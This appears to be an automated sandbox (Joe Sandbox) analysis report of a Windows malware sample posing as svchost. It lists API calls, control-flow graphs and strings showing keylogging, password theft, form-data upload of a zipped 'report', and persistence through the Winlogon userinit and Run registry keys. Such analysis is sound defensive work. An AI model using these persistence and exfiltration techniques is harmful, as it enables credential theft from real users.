                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                • API String ID: 731831024-2333288578
                                                                                                                                                                                                                • Opcode ID: 3675d8f85360a5e42fdf129066f6fc156b204150f992ae2d8091fb389441697d
                                                                                                                                                                                                                • Instruction ID: 2d5ef63a60c9de5ec671934e0939ef4de57ca08cf316f924e5d35224c2b895ed
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3675d8f85360a5e42fdf129066f6fc156b204150f992ae2d8091fb389441697d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16115E71A81204ABEB70DBE09C4DFAE7B7CEB04B45F904848FB01E7180E7B4A614C7A1
                                                                                                                                                                                                                Function 02A01360 Relevance: 3.2, APIs: 2, Instructions: 241memorylibraryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 02A01451
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 02A01515
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2654834253.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2a00000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3550616410-0
                                                                                                                                                                                                                • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                                • Instruction ID: 8c213daab9712e7b5102ab5a373b39487f3b8854f7980512474c738465126cf2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70912AB1D00615AFCB20DFA8D990BEEB7B9AF88354F154559E809B7384EB34AD01CF94
                                                                                                                                                                                                                Function 02BB4180 Relevance: 98.3, APIs: 42, Strings: 14, Instructions: 300memoryfilenetworkCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 449 2bb4180-2bb41aa GetProcessHeap HeapAlloc 450 2bb41bc-2bb4217 449->450 451 2bb41ac-2bb41b9 memset 449->451 452 2bb421d-2bb422d GetTcpTable 450->452 453 2bb44c5-2bb44cb 450->453 451->450 454 2bb422f-2bb423d GetProcessHeap HeapValidate 452->454 455 2bb4290-2bb4292 452->455 456 2bb424b-2bb4252 454->456 457 2bb423f-2bb4245 GetProcessHeap HeapFree 454->457 458 2bb42bd-2bb42cb 455->458 459 2bb4294-2bb42a2 GetProcessHeap HeapValidate 455->459 460 2bb4278-2bb427d 456->460 461 2bb4254-2bb426a GetProcessHeap HeapAlloc 456->461 457->456 463 2bb42d1-2bb42ea GetProcessHeap HeapAlloc 458->463 464 2bb4370-2bb437d call 2bc41b0 458->464 459->453 462 2bb42a8-2bb42ba GetProcessHeap HeapFree 459->462 460->453 466 2bb4283-2bb428a GetTcpTable 460->466 461->460 465 2bb426c-2bb4275 memset 461->465 463->464 468 2bb42f0-2bb4303 memset 463->468 465->460 466->455 469 2bb4305-2bb430d 468->469 469->469 471 2bb430f-2bb4319 469->471 472 2bb442a-2bb442d 471->472 473 2bb431f 471->473 475 2bb4430-2bb4436 472->475 474 2bb4322-2bb432f call 2bb4090 473->474 480 2bb4415-2bb4424 474->480 481 2bb4335-2bb4342 call 2bb4090 474->481 475->475 477 2bb4438-2bb444d 475->477 479 2bb4450-2bb4455 477->479 479->479 482 2bb4457-2bb4462 479->482 480->472 480->474 488 2bb4380-2bb4382 481->488 489 2bb4344-2bb4355 GetProcessHeap HeapValidate 481->489 484 2bb44a3-2bb44b7 GetProcessHeap HeapValidate 482->484 485 2bb4464-2bb449d SetFilePointer LockFile WriteFile UnlockFile 482->485 484->453 487 2bb44b9-2bb44bf GetProcessHeap HeapFree 484->487 485->484 487->453 491 2bb4385-2bb438a 488->491 489->480 490 2bb435b-2bb436b GetProcessHeap HeapFree 489->490 490->480 491->491 492 2bb438c-2bb43e5 htons * 2 _snprintf GetProcessHeap HeapValidate 491->492 493 2bb43f3-2bb4404 GetProcessHeap HeapValidate 492->493 494 2bb43e7-2bb43ed GetProcessHeap HeapFree 492->494 495 2bb4412 493->495 496 2bb4406-2bb440c GetProcessHeap HeapFree 493->496 494->493 495->480 496->495
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,75573490), ref: 02BB419D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB41A0
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB41B4
                                                                                                                                                                                                                • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB4224
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4232
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB4235
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4242
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB4245
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02BB425D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB4260
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB4270
                                                                                                                                                                                                                • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB428A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4297
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB429A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB42AB
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB42AE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 02BB42DA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB42DD
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB42F4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02BB4346
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB434D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB435E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB4365
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BB439D
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BB43B0
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB43C8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB43DA
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB43DD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB43EA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB43ED
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB43F9
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB43FC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB4409
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB440C
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(02BB58F7,00000000,00000000,00000001), ref: 02BB446E
                                                                                                                                                                                                                • LockFile.KERNEL32(02BB58F7,00000000,00000000,00000001,00000000), ref: 02BB447E
                                                                                                                                                                                                                • WriteFile.KERNEL32(02BB58F7,00000000,00000001,00000000,00000000), ref: 02BB448D
                                                                                                                                                                                                                • UnlockFile.KERNEL32(02BB58F7,02BB58F7,00000000,00000001,00000000), ref: 02BB449D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB44AC
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB44AF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB44BC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB44BF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                                • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                                • API String ID: 2439004899-2402783461
                                                                                                                                                                                                                • Opcode ID: 5f5ef55772b553a228ab7576bb457e016a8f12ea4f45d8c1d010d5c0f53379cc
                                                                                                                                                                                                                • Instruction ID: 22693621b77a3cfa7a040edd3b326cf8be284b6066337652e35d92e69e80c942
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f5ef55772b553a228ab7576bb457e016a8f12ea4f45d8c1d010d5c0f53379cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEA1B0B1E40204ABDB619FA4AC5CFAF7F78EF85741F548598FA05AB241DBB09414CBA0
                                                                                                                                                                                                                Function 02BC39D0 Relevance: 86.4, APIs: 35, Strings: 14, Instructions: 640memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB68,75570F00,00000000,75572F00), ref: 02BC39E9
                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02BC39FB
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC3A1B
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BC3A2B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC3B00
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC3B4C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC3B59
                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000000), ref: 02BC3B9A
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC3BCA
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC3C72
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC3C7F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BC3C85
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC3CA2
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BC3CB9
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BC4076
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 02BC4083
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC4096
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC40A3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC40C7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC40CA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC40D6
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC40D9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC40E7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC40EA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC40F6
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC40F9
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB68), ref: 02BC4100
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Path$Process$BackslashCurrentDirectory$AttributesCriticalDeleteFreeSectionValidate_snprintf$AllocCopyCountEnterExistsFolderLeaveTickVirtual
                                                                                                                                                                                                                • String ID: -----------------------------$%s%s$%s%u.zip$--$-----------------------------$3d11e105700a76c9$9E938D2Aa$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt
                                                                                                                                                                                                                • API String ID: 2790020909-272413446
                                                                                                                                                                                                                • Opcode ID: cf57ab37a81f65bc457ac3c38898bc7c665e905a33fd3951cc396ee38504c755
                                                                                                                                                                                                                • Instruction ID: 89e6c169b30d928480cb7e1482399d8f2654cbfa17d5aff28d21a1d2087a9f1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf57ab37a81f65bc457ac3c38898bc7c665e905a33fd3951cc396ee38504c755
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8226E319046465BCB218F3488A4BFB7BF6EF45344FA485C8ED969B281EB32D94DC790
                                                                                                                                                                                                                Function 02BC3BA4 Relevance: 67.0, APIs: 27, Strings: 11, Instructions: 477filememorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 651 2bc3ba4-2bc3bab 652 2bc3bb0-2bc3bc1 651->652 652->652 653 2bc3bc3-2bc3bd2 PathAddBackslashA 652->653 654 2bc3bd3-2bc3bd9 653->654 654->654 655 2bc3bdb-2bc3c0a 654->655 657 2bc3c10-2bc3c14 655->657 658 2bc3c16-2bc3c18 657->658 659 2bc3c30-2bc3c32 657->659 660 2bc3c2c-2bc3c2e 658->660 661 2bc3c1a-2bc3c20 658->661 662 2bc3c35-2bc3c37 659->662 660->662 661->659 663 2bc3c22-2bc3c2a 661->663 664 2bc3c39-2bc3c3e 662->664 665 2bc3c85-2bc3cc3 GetTickCount _snprintf VirtualAlloc 662->665 663->657 663->660 668 2bc3c40-2bc3c44 664->668 666 2bc406f-2bc408b SetCurrentDirectoryA PathFileExistsA 665->666 667 2bc3cc9-2bc3cec lstrcpynA call 2bd9780 665->667 670 2bc408d-2bc40a3 SetFileAttributesA DeleteFileA 666->670 671 2bc40a9-2bc40bf 666->671 681 2bc3cfd-2bc3d44 VirtualFree call 2bb7680 SetFileAttributesA RemoveDirectoryA call 2bb78e0 667->681 682 2bc3cee-2bc3cf8 call 2bd9910 call 2bd9880 667->682 672 2bc3c46-2bc3c48 668->672 673 2bc3c60-2bc3c62 668->673 670->671 676 2bc40db-2bc40df 671->676 677 2bc40c1-2bc40ce GetProcessHeap HeapValidate 671->677 678 2bc3c5c-2bc3c5e 672->678 679 2bc3c4a-2bc3c50 672->679 674 2bc3c65-2bc3c67 673->674 674->665 680 2bc3c69-2bc3c7f SetFileAttributesA DeleteFileA 674->680 684 2bc40fb-2bc410e LeaveCriticalSection 676->684 685 2bc40e1-2bc40ee GetProcessHeap HeapValidate 676->685 677->676 683 2bc40d0-2bc40d9 GetProcessHeap HeapFree 677->683 678->674 679->673 686 2bc3c52-2bc3c5a 679->686 680->665 681->666 695 2bc3d4a-2bc3d4d 681->695 682->681 683->676 685->684 689 2bc40f0-2bc40f9 GetProcessHeap HeapFree 685->689 686->668 686->678 689->684 696 2bc3d50-2bc3d55 695->696 696->696 697 2bc3d57-2bc3d60 696->697 698 2bc3d8a-2bc3d8f 697->698 699 2bc3d62-2bc3d7c GetProcessHeap HeapAlloc 697->699 698->666 701 2bc3d95-2bc3dac 698->701 699->698 700 2bc3d7e-2bc3d87 memset 699->700 700->698 702 2bc3db0-2bc3db5 701->702 702->702 703 2bc3db7-2bc3dbc 702->703 704 2bc3dc0-2bc3dc6 703->704 704->704 705 2bc3dc8-2bc3dd9 704->705 706 2bc3de0-2bc3de6 705->706 706->706 707 2bc3de8-2bc3dfe 706->707 708 2bc3e00-2bc3e06 707->708 708->708 709 2bc3e08-2bc3e1b 708->709 710 2bc3e20-2bc3e25 709->710 710->710 711 2bc3e27-2bc3e2c 710->711 712 2bc3e30-2bc3e36 711->712 712->712 713 2bc3e38-2bc3e49 712->713 714 2bc3e50-2bc3e56 713->714 714->714 715 2bc3e58-2bc3e6a call 2bb32e0 714->715 718 2bc3e70-2bc3e75 715->718 718->718 719 2bc3e77-2bc3e7c 718->719 720 2bc3e80-2bc3e86 719->720 720->720 721 2bc3e88-2bc3e99 720->721 722 2bc3ea0-2bc3ea6 721->722 722->722 723 2bc3ea8-2bc3ebb 722->723 724 2bc3ec0-2bc3ec5 723->724 724->724 725 2bc3ec7-2bc3ecc 724->725 726 2bc3ed0-2bc3ed6 725->726 726->726 727 2bc3ed8-2bc3ee9 726->727 728 2bc3ef0-2bc3ef6 727->728 728->728 729 2bc3ef8-2bc3f0e 728->729 730 2bc3f10-2bc3f16 729->730 730->730 731 2bc3f18-2bc3f25 730->731 732 2bc3f28-2bc3f2e 731->732 732->732 733 2bc3f30-2bc3f40 732->733 734 2bc3f42-2bc3f47 733->734 734->734 735 2bc3f49-2bc3f4e 734->735 736 2bc3f50-2bc3f56 735->736 736->736 737 2bc3f58-2bc3f69 736->737 738 2bc3f70-2bc3f76 737->738 738->738 739 2bc3f78-2bc3f8b 738->739 740 2bc3f90-2bc3f95 739->740 740->740 741 2bc3f97-2bc3f9c 740->741 742 2bc3fa0-2bc3fa6 741->742 742->742 743 2bc3fa8-2bc3fb9 742->743 744 2bc3fc0-2bc3fc6 743->744 744->744 745 2bc3fc8-2bc3fdf 744->745 746 2bc3fe1-2bc3fe3 745->746 747 2bc3fe6-2bc3feb 746->747 747->747 748 2bc3fed-2bc3ff8 call 2bc3800 747->748 751 2bc3ffa-2bc4005 Sleep 748->751 752 2bc4007-2bc400f 748->752 751->746 751->752 753 2bc4011-2bc4015 752->753 754 2bc4017-2bc4019 753->754 755 2bc4031-2bc4033 753->755 756 2bc402d-2bc402f 754->756 757 2bc401b-2bc4021 754->757 758 2bc4036-2bc4038 755->758 756->758 757->755 759 2bc4023-2bc402b 757->759 758->666 760 2bc403a-2bc403f 758->760 759->753 759->756 761 2bc4041-2bc4045 760->761 762 2bc4047-2bc4049 761->762 763 2bc4061-2bc4063 761->763 764 2bc405d-2bc405f 762->764 765 2bc404b-2bc4051 762->765 766 2bc4066-2bc4068 763->766 764->766 765->763 767 2bc4053-2bc405b 765->767 766->666 768 2bc406a call 2bb3500 766->768 767->761 767->764 768->666
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC3BCA
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC3C72
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC3C7F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BC3C85
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC3CA2
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BC3CB9
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BC3CD6
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02BC3D05
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                                • String ID: -----------------------------$%s%u.zip$--$-----------------------------$3d11e105700a76c9$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                                • API String ID: 3203035732-2680028081
                                                                                                                                                                                                                • Opcode ID: 6e3c66a9694fcf209e64b310352c949bb1898671b41e3a03f8d8ae9a00109e81
                                                                                                                                                                                                                • Instruction ID: e2428dcd79b507c15aaee88293c68a2192306c01cfc645e497384e1dcd345c56
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e3c66a9694fcf209e64b310352c949bb1898671b41e3a03f8d8ae9a00109e81
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F15D319046465BCB258F3098A4BFB7BF6EF45344FA485C8ED869B241DB32DA49C7A0
                                                                                                                                                                                                                Function 02BC7DD0 Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 244registrymemorysynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 966 2bc7dd0-2bc7de2 967 2bc7de5-2bc7dea 966->967 967->967 968 2bc7dec-2bc7df3 967->968 969 2bc7df9-2bc7e06 PathFileExistsA 968->969 970 2bc7fd7-2bc7fdf IsUserAnAdmin 968->970 969->970 973 2bc7e0c-2bc7e2b RegOpenKeyExA 969->973 971 2bc7ff8-2bc8008 970->971 972 2bc7fe1-2bc7ff6 970->972 974 2bc800d-2bc8015 RegOpenKeyExA 971->974 972->974 975 2bc7f78-2bc7f91 RegOpenKeyExA 973->975 976 2bc7e31-2bc7e55 RegQueryValueExA 973->976 977 2bc806b-2bc8071 974->977 978 2bc8017-2bc8026 CreateEventA 974->978 975->970 981 2bc7f93-2bc7f9b 975->981 979 2bc7f68-2bc7f76 RegFlushKey 976->979 980 2bc7e5b-2bc7e75 GetProcessHeap HeapAlloc 976->980 978->977 982 2bc8028-2bc803b RegNotifyChangeKeyValue 978->982 984 2bc7fd1 RegCloseKey 979->984 980->979 983 2bc7e7b-2bc7ea9 memset RegQueryValueExA StrStrIA 980->983 985 2bc7fa0-2bc7fa5 981->985 986 2bc8041-2bc8048 WaitForSingleObject 982->986 987 2bc7eaf-2bc7eb1 983->987 988 2bc7f46-2bc7f5a GetProcessHeap HeapValidate 983->988 984->970 985->985 989 2bc7fa7-2bc7fd0 RegSetValueExA RegFlushKey 985->989 986->986 990 2bc804a-2bc8050 986->990 991 2bc7eb4-2bc7eb9 987->991 988->979 992 2bc7f5c-2bc7f62 GetProcessHeap HeapFree 988->992 989->984 993 2bc805c-2bc8069 RegNotifyChangeKeyValue 990->993 994 2bc8052-2bc8057 call 2bd4a10 990->994 991->991 995 2bc7ebb-2bc7ebd 991->995 992->979 993->986 994->993 997 2bc7ebf-2bc7ec4 995->997 998 2bc7ee1-2bc7ee6 995->998 997->998 1000 2bc7ec6-2bc7ec9 997->1000 999 2bc7ee8-2bc7eed 998->999 999->999 1001 2bc7eef-2bc7ef1 999->1001 1002 2bc7ed0-2bc7ed6 1000->1002 1003 2bc7ef4-2bc7efa 1001->1003 1002->1002 1004 2bc7ed8-2bc7ede 1002->1004 1003->1003 1005 2bc7efc-2bc7f0d 1003->1005 1004->998 1006 2bc7f10-2bc7f16 1005->1006 1006->1006 1007 2bc7f18-2bc7f24 1006->1007 1008 2bc7f27-2bc7f2c 1007->1008 1008->1008 1009 2bc7f2e-2bc7f40 RegSetValueExA 1008->1009 1009->988
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02BC7DFE
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02BC7E27
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BC7E47
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02BC7E64
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC7E6B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC7E7F
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BC7E99
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02BC7EA1
                                                                                                                                                                                                                • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02BC7F40
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7F4F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC7F52
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7F5F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC7F62
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02BC7F6C
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02BC7F8D
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02BC7FBD
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02BC7FC7
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(?), ref: 02BC7FD1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC7FD7
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02BC800D
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC801C
                                                                                                                                                                                                                • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02BC8039
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BC8044
                                                                                                                                                                                                                • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02BC8067
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
